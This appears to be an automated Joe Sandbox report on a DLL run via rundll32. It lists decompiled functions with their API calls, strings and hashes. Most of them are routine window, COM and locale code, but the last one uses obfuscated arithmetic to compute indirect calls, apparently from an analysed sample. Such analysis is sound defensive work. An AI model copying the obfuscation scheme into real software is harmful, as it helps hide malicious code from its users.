                                                                        • Opcode Fuzzy Hash: 45fba12e316358985154b0c6b51ad8b47f09cec3adec5e1ce226de42e1b80597
                                                                        • Instruction Fuzzy Hash: 39519CB4A00B49DFDB21DF68C884A9ABBF5FF48344F00465EF9999B261C774E881CB00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E10033B73(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
                                                                        				intOrPtr _v8;
                                                                        				void* __ebp;
                                                                        				int _t42;
                                                                        				void* _t69;
                                                                        				intOrPtr _t71;
                                                                        				intOrPtr* _t74;
                                                                        				intOrPtr _t76;
                                                                        				void* _t77;
                                                                        
                                                                        				_t69 = __edx;
                                                                        				_push(__ecx);
                                                                        				_t71 = _a4;
                                                                        				_v8 = __ecx;
                                                                        				if( *((intOrPtr*)(_t71 + 0x84)) == 0) {
                                                                        					L6:
                                                                        					if(( *(_t71 + 0x7c) & 0x00000004) != 0) {
                                                                        						_a16 = _a16 | 0x00000004;
                                                                        						if((_a17 & 0x00000050) != 0) {
                                                                        							_a16 = _a16 & 0xffff2fff | 0x00002000;
                                                                        						}
                                                                        					}
                                                                        					_t74 = E100339A3(_v8, _a16);
                                                                        					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                                                        					if( *(_t74 + 0x34) == 0) {
                                                                        						 *(_t74 + 0x34) =  *(_t71 + 0x1c);
                                                                        					}
                                                                        					E1002D821(E10020230(_t74, 0xe81f), _t69, _t71, 0);
                                                                        					 *((intOrPtr*)( *_t74 + 0x144))(1);
                                                                        					_t42 = GetWindowLongA( *(_t71 + 0x1c), 0xfffffff0);
                                                                        					if((_t42 & 0x10000000) == 0) {
                                                                        						L14:
                                                                        						return _t42;
                                                                        					} else {
                                                                        						E100203AD(_t74, 8);
                                                                        						L13:
                                                                        						_t42 = UpdateWindow( *(_t74 + 0x1c));
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t76 =  *((intOrPtr*)(_t71 + 0x88));
                                                                        				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x90)) == 0 || E1002D0E3(_t76) != 1 || ( *(_t76 + 0x7c) & _a16 & 0x000000f0) == 0) {
                                                                        					goto L6;
                                                                        				} else {
                                                                        					_t74 = E100220EE(_t77, GetParent( *(_t76 + 0x1c)));
                                                                        					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                                                        					 *((intOrPtr*)( *_t74 + 0x144))(1);
                                                                        					goto L13;
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 10033BB6
                                                                          • Part of subcall function 100204FE: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,10021B8B,?,10021B8B,00000000,?,?,000000FF,000000FF,00000015), ref: 10020524
                                                                        • GetWindowLongA.USER32 ref: 10033C57
                                                                        • UpdateWindow.USER32(?), ref: 10033C70
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Window$LongParentUpdate
                                                                        • String ID: P
                                                                        • API String ID: 1906497633-3110715001
                                                                        • Opcode ID: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                        • Instruction ID: 435d97fdf23aa9ac89b11464d0137bb6244da47e738824af3fb8fae0d11c22b6
                                                                        • Opcode Fuzzy Hash: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                        • Instruction Fuzzy Hash: 1D31BE74600749AFDB12DF24DC89FAEBBE9EF00355F008519F952AA6A2CB71AC50CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E10025CEC(void* __ecx, void* __eflags) {
                                                                        				intOrPtr* _t21;
                                                                        				void* _t25;
                                                                        				struct HINSTANCE__* _t26;
                                                                        				_Unknown_base(*)()* _t30;
                                                                        				void* _t39;
                                                                        				CHAR* _t40;
                                                                        				void* _t42;
                                                                        				signed int* _t43;
                                                                        				void* _t44;
                                                                        				void* _t46;
                                                                        
                                                                        				E10011BF0(0x1003acec, _t46);
                                                                        				_t43 =  *(_t46 + 0x10);
                                                                        				 *_t43 =  *_t43 & 0x00000000;
                                                                        				E10025C6A(_t46 - 0x10,  *((intOrPtr*)(_t46 + 8)));
                                                                        				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
                                                                        				_t21 = E100243B2();
                                                                        				_t38 =  *_t21;
                                                                        				 *(_t46 + 0x10) =  *((intOrPtr*)( *_t21 + 0xc))(_t39, _t42, __ecx) + 0x10;
                                                                        				 *(_t46 - 4) = 1;
                                                                        				_t25 = E1002583A( *((intOrPtr*)(_t46 - 0x10)), _t46 + 0x10);
                                                                        				_t40 =  *(_t46 + 0x10);
                                                                        				if(_t25 != 0) {
                                                                        					_t26 = LoadLibraryA(_t40);
                                                                        					if(_t26 == 0) {
                                                                        						goto L1;
                                                                        					}
                                                                        					_t30 = GetProcAddress(_t26, "DllGetClassObject");
                                                                        					if(_t30 == 0) {
                                                                        						_t44 = 0x800401f9;
                                                                        					} else {
                                                                        						_t44 =  *_t30( *((intOrPtr*)(_t46 + 8)),  *((intOrPtr*)(_t46 + 0xc)), _t43);
                                                                        					}
                                                                        					L6:
                                                                        					E100014B0(_t40 - 0x10, _t38);
                                                                        					E100014B0( *((intOrPtr*)(_t46 - 0x10)) + 0xfffffff0, _t38);
                                                                        					 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
                                                                        					return _t44;
                                                                        				}
                                                                        				L1:
                                                                        				_t44 = 0x80040154;
                                                                        				goto L6;
                                                                        			}














                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 10025CF1
                                                                          • Part of subcall function 10025C6A: wsprintfA.USER32 ref: 10025CC5
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                          • Part of subcall function 1002583A: RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                          • Part of subcall function 1002583A: RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                          • Part of subcall function 1002583A: RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,10025DBC,?,100430A8,00000000), ref: 10025D40
                                                                        • GetProcAddress.KERNEL32(00000000,DllGetClassObject), ref: 10025D50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpen$AddressH_prologLibraryLoadProcQueryValuewsprintf
                                                                        • String ID: DllGetClassObject
                                                                        • API String ID: 821125782-1075368562
                                                                        • Opcode ID: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                        • Instruction ID: 4c2bc5ab8f47dce9d6dfca02a5288212b81b2082d3bc100dcb553b8fe7e2210e
                                                                        • Opcode Fuzzy Hash: fe87215658dc2e7c6bf684a8dbb86629762993b0189a650beec273d547fffb81
                                                                        • Instruction Fuzzy Hash: CB11BC3260021AAFDB11DFA4DC08BAF77B8FF00356F044969F812E7261DB34E9018BA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 53%
                                                                        			E10034C5F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				char _v16;
                                                                        				char _v276;
                                                                        				intOrPtr _t10;
                                                                        				long _t12;
                                                                        				void* _t13;
                                                                        				CHAR* _t16;
                                                                        				void* _t30;
                                                                        				void* _t33;
                                                                        
                                                                        				_t10 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t10;
                                                                        				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
                                                                        				if(_t12 == 0 || _t12 == 0x104) {
                                                                        					L4:
                                                                        					_t13 = 0;
                                                                        				} else {
                                                                        					_push(__esi);
                                                                        					_push(__edi);
                                                                        					_t16 = PathFindExtensionA( &_v276);
                                                                        					asm("movsd");
                                                                        					asm("movsw");
                                                                        					asm("movsb");
                                                                        					_pop(_t30);
                                                                        					_pop(_t33);
                                                                        					if(_t16 -  &_v276 + 7 > 0x104) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						lstrcpyA(_t16,  &_v16);
                                                                        						_t13 = E10034959(0x104, _t30, _t33,  &_v276);
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(_t13, _v8);
                                                                        			}













                                                                        APIs
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034C81
                                                                        • PathFindExtensionA.SHLWAPI(?), ref: 10034C98
                                                                        • lstrcpyA.KERNEL32(00000000,?), ref: 10034CC2
                                                                          • Part of subcall function 10034959: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                          • Part of subcall function 10034959: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                          • Part of subcall function 10034959: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                          • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                        • String ID: %s.dll
                                                                        • API String ID: 4178508759-3668843792
                                                                        • Opcode ID: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                        • Instruction ID: 2fc2d964ca32bfe118a4256934f177e00eb1d7d938e4b77c6fceda29c47fe86b
                                                                        • Opcode Fuzzy Hash: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                        • Instruction Fuzzy Hash: 4601A7B6E0111CAFDF56EBA4CC85DEE77BCFB49341F0105BAE615DB110EAB0AA448B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 59%
                                                                        			E100364C3() {
                                                                        				signed short _v16;
                                                                        				signed short _v20;
                                                                        				char _v24;
                                                                        				signed int _t6;
                                                                        				intOrPtr* _t16;
                                                                        				signed int _t19;
                                                                        
                                                                        				_t6 =  *0x1004b8c8; // 0xffffffff
                                                                        				if(_t6 != 0xffffffff) {
                                                                        					return _t6;
                                                                        				}
                                                                        				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
                                                                        				_t19 = 0x40000;
                                                                        				if(_t16 != 0) {
                                                                        					E10011C50( &_v24, 0, 0x14);
                                                                        					_push( &_v24);
                                                                        					_v24 = 0x14;
                                                                        					if( *_t16() >= 0) {
                                                                        						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                                                                        					}
                                                                        				}
                                                                        				 *0x1004b8c8 = _t19;
                                                                        				return _t19;
                                                                        			}










                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 100364DA
                                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 100364E6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: COMCTL32.DLL$DllGetVersion
                                                                        • API String ID: 1646373207-1518460440
                                                                        • Opcode ID: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                        • Instruction ID: 84e3accee20d911db9e507edd914a9ca92682ab11397d206feed8d4dda6cc4c4
                                                                        • Opcode Fuzzy Hash: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                        • Instruction Fuzzy Hash: 3BF04FB1E006296AE702DBED9C84BAA7BACEB08751F510535FA10EB191E670DD0487B5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E10029A8E(struct HWND__* _a4, intOrPtr _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v20;
                                                                        				intOrPtr _t9;
                                                                        				signed int _t17;
                                                                        
                                                                        				_t9 =  *0x1004c470; // 0x1bfbe703
                                                                        				_v8 = _t9;
                                                                        				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
                                                                        					_t10 = 0;
                                                                        				} else {
                                                                        					GetClassNameA(_a4,  &_v20, 0xa);
                                                                        					_t17 = lstrcmpiA( &_v20, "combobox");
                                                                        					asm("sbb eax, eax");
                                                                        					_t10 =  ~_t17 + 1;
                                                                        				}
                                                                        				return E100117AE(_t10, _v8);
                                                                        			}








                                                                        APIs
                                                                        • GetWindowLongA.USER32 ref: 10029AA7
                                                                        • GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                        • lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClassLongNameWindowlstrcmpi
                                                                        • String ID: combobox
                                                                        • API String ID: 2054663530-2240613097
                                                                        • Opcode ID: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                        • Instruction ID: 60cbb10a2f119aa8ec71494133184de8fc03b2720933236f2cbab57e6d3057ab
                                                                        • Opcode Fuzzy Hash: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                        • Instruction Fuzzy Hash: 32F03A3151421CAFDB01EFA5CC95EAE3BB4FB05385F508524F821DA1A1DB30AA448B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 62%
                                                                        			E10019599(void* __eflags) {
                                                                        				_Unknown_base(*)()* _t9;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				void* _t13;
                                                                        				void* _t14;
                                                                        				void* _t15;
                                                                        				void* _t16;
                                                                        
                                                                        				_push(0x10);
                                                                        				_push(0x10042d28);
                                                                        				E10012514(_t13, _t14, _t15);
                                                                        				_t9 =  *0x1004f820;
                                                                        				if(_t9 == 0) {
                                                                        					if( *0x1004f3e0 == 1) {
                                                                        						L4:
                                                                        						_t9 = E10019589;
                                                                        						 *0x1004f820 = E10019589;
                                                                        					} else {
                                                                        						_t12 = GetModuleHandleA("kernel32.dll");
                                                                        						if(_t12 == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
                                                                        							 *0x1004f820 = _t9;
                                                                        							if(_t9 == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
                                                                        				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
                                                                        				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
                                                                        				return E1001254F(_t10);
                                                                        			}









                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,10042D28,00000010,100139E9,00000000,00000FA0,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 100195BC
                                                                        • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 100195CC
                                                                        Strings
                                                                        • InitializeCriticalSectionAndSpinCount, xrefs: 100195C6
                                                                        • kernel32.dll, xrefs: 100195B7
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                        • API String ID: 1646373207-3733552308
                                                                        • Opcode ID: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                        • Instruction ID: 1db327cb421c3a6b8c58775e1e461de9fba8f787e71f0b035f5b3f69bb676500
                                                                        • Opcode Fuzzy Hash: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                        • Instruction Fuzzy Hash: 05F05E70600656EFEB02EFA58D98B9D3AF2FB45345B114169F410EE160EB35D6809B28
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E10018BC6() {
                                                                        				signed int _v12;
                                                                        				signed long long _v20;
                                                                        				signed long long _v28;
                                                                        				signed char _t9;
                                                                        
                                                                        				_t9 = GetModuleHandleA("KERNEL32");
                                                                        				if(_t9 == 0) {
                                                                        					L6:
                                                                        					_v12 =  *0x10042c68;
                                                                        					_v20 =  *0x10042c60;
                                                                        					asm("fsubr qword [ebp-0x10]");
                                                                        					_v28 = _v20 / _v12 * _v12;
                                                                        					asm("fcomp qword [0x10042c58]");
                                                                        					asm("fnstsw ax");
                                                                        					if((_t9 & 0x00000041) != 0) {
                                                                        						return 0;
                                                                        					} else {
                                                                        						return 1;
                                                                        					}
                                                                        				} else {
                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                        					if(__eax == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_push(0);
                                                                        						return __eax;
                                                                        					}
                                                                        				}
                                                                        			}







                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,100131C1), ref: 10018BCB
                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 10018BDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                        • API String ID: 1646373207-3105848591
                                                                        • Opcode ID: e314ec6c60ecec65d41af99910ac72b9b0e50ab7ed27774764df433c962e011c
                                                                        • Instruction ID: 6d1cec56d5ac0fa8db19260d1587fa22ee3b654c32ead3ba123bcf5a7b7114e3
                                                                        • Opcode Fuzzy Hash: e314ec6c60ecec65d41af99910ac72b9b0e50ab7ed27774764df433c962e011c
                                                                        • Instruction Fuzzy Hash: 48C012A020C201AEEA42ABF20C9CF8A218CEBA4783F000014A502EC080CF21DB808720
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E10004DD0() {
                                                                        				void* _t51;
                                                                        				signed int _t53;
                                                                        				signed int _t59;
                                                                        				signed int _t61;
                                                                        				intOrPtr _t82;
                                                                        				signed int _t96;
                                                                        				signed int _t103;
                                                                        				signed int _t111;
                                                                        				signed int _t112;
                                                                        				signed int _t120;
                                                                        				signed int _t121;
                                                                        				signed int _t125;
                                                                        				signed int _t132;
                                                                        				signed int _t139;
                                                                        				signed int _t142;
                                                                        				signed int _t151;
                                                                        				intOrPtr _t157;
                                                                        				signed int _t159;
                                                                        				signed int _t162;
                                                                        				signed int _t163;
                                                                        				void* _t164;
                                                                        				signed int _t166;
                                                                        				signed int _t173;
                                                                        				signed int _t177;
                                                                        				signed int _t189;
                                                                        				void* _t195;
                                                                        				void* _t196;
                                                                        
                                                                        				_t164 =  *(_t195 + 0xc);
                                                                        				if(_t164 != 0) {
                                                                        					if( *((intOrPtr*)(_t164 + 0x10)) != 0) {
                                                                        						_t132 =  *0x1004b0e0; // 0x0
                                                                        						_t103 =  *0x1004b0dc; // 0x0
                                                                        						_t151 =  *0x1004b0e8; // 0x0
                                                                        						_t162 =  *0x1004b0e4; // 0x0
                                                                        						_t82 =  *((intOrPtr*)(_t164 + 4));
                                                                        						_t163 =  *0x1004b0ec; // 0x0
                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 0x28)) + ((_t103 * _t132 * _t151 + _t162 * 2) * _t151 + _t132 * _t132 - _t162 - _t163) * 4 + _t82))(_t82, 0, 0);
                                                                        					}
                                                                        					_t111 =  *0x1004b0dc; // 0x0
                                                                        					_t53 =  *0x1004b0e8; // 0x0
                                                                        					_t166 =  *0x1004b0ec; // 0x0
                                                                        					_t10 = _t111 + 1; // 0x1
                                                                        					_t112 =  *0x1004b0e0; // 0x0
                                                                        					 *0x1004d3e0(((_t112 - _t166 << 1) - _t10 * _t111 -  *0x1004b0e4 + _t53 *  *0x1004b0d8 << 5) +  *((intOrPtr*)(_t164 + 0x30)));
                                                                        					_t196 = _t195 + 4;
                                                                        					if( *((intOrPtr*)(_t164 + 8)) == 0) {
                                                                        						L9:
                                                                        						_t157 =  *((intOrPtr*)(_t164 + 4));
                                                                        						if(_t157 != 0) {
                                                                        							_t59 =  *0x1004b0dc; // 0x0
                                                                        							_t120 =  *0x1004b0ec; // 0x0
                                                                        							_t139 =  *0x1004b0e8; // 0x0
                                                                        							_t121 =  *0x1004b0e0; // 0x0
                                                                        							 *((intOrPtr*)(_t164 + 0x20))(_t157, 0, (_t59 * _t120 + 1 + _t139 *  *0x1004b0d8 * 0x3fffffff) * _t120 + (_t139 + 1 + _t121 * 0x3fffffff) *  *0x1004b0e4 + 0x2000 + _t121 * 2 - _t59 << 2,  *((intOrPtr*)(_t164 + 0x34)));
                                                                        						}
                                                                        						return HeapFree(GetProcessHeap(), 0, _t164);
                                                                        					} else {
                                                                        						_t125 =  *0x1004b0e0; // 0x0
                                                                        						_t159 =  *0x1004b0ec; // 0x0
                                                                        						_t173 =  *0x1004b0dc; // 0x0
                                                                        						_t142 =  *0x1004b0d8; // 0x0
                                                                        						_t61 =  *0x1004b0e4; // 0x0
                                                                        						_t12 = _t125 + 1; // 0x1
                                                                        						 *(_t196 + 0x18) = 0;
                                                                        						if( *((intOrPtr*)(_t164 + 0xc)) - (_t173 * _t142 + _t12 * _t159 + _t61 << 1) <= 0) {
                                                                        							L8:
                                                                        							 *0x1004d3e0((_t61 << 4) - ((_t142 * _t142 << 4) + 0x10) * _t159 +  *((intOrPtr*)(_t164 + 8)));
                                                                        							_t196 = _t196 + 4;
                                                                        							goto L9;
                                                                        						} else {
                                                                        							goto L5;
                                                                        						}
                                                                        						do {
                                                                        							L5:
                                                                        							_t96 =  *0x1004b0dc; // 0x0
                                                                        							_t177 =  *0x1004b0e8; // 0x0
                                                                        							 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t164 + 8));
                                                                        							if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)) + ( *(_t196 + 0x18) + ((_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 2 + (_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 4)) != 0) {
                                                                        								_t189 =  *0x1004b0e4; // 0x0
                                                                        								_t25 = _t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 - 2; // -268742890
                                                                        								 *((intOrPtr*)(_t164 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x14)) + ((_t125 - (_t142 * _t142 << 1) + _t125 + 2) *  *0x1004b0e4 +  *((intOrPtr*)(_t196 + 0x1c)) + (_t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 + _t25) * _t96 + (_t159 + 1) * _t125 * 2) * 4)),  *((intOrPtr*)(_t164 + 0x34)));
                                                                        								_t142 =  *0x1004b0d8; // 0x0
                                                                        								_t159 =  *0x1004b0ec; // 0x0
                                                                        								_t125 =  *0x1004b0e0; // 0x0
                                                                        								_t96 =  *0x1004b0dc; // 0x0
                                                                        								_t196 = _t196 + 8;
                                                                        							}
                                                                        							_t61 =  *0x1004b0e4; // 0x0
                                                                        							 *(_t196 + 0x18) =  *(_t196 + 0x18) + 1;
                                                                        							_t37 = _t125 + 1; // 0x1
                                                                        						} while ( *(_t196 + 0x18) <  *((intOrPtr*)(_t164 + 0xc)) - (_t96 * _t142 + _t37 * _t159 + _t61 << 1));
                                                                        						goto L8;
                                                                        					}
                                                                        				}
                                                                        				return _t51;
                                                                        			}






























                                                                        APIs
                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 10004E6C
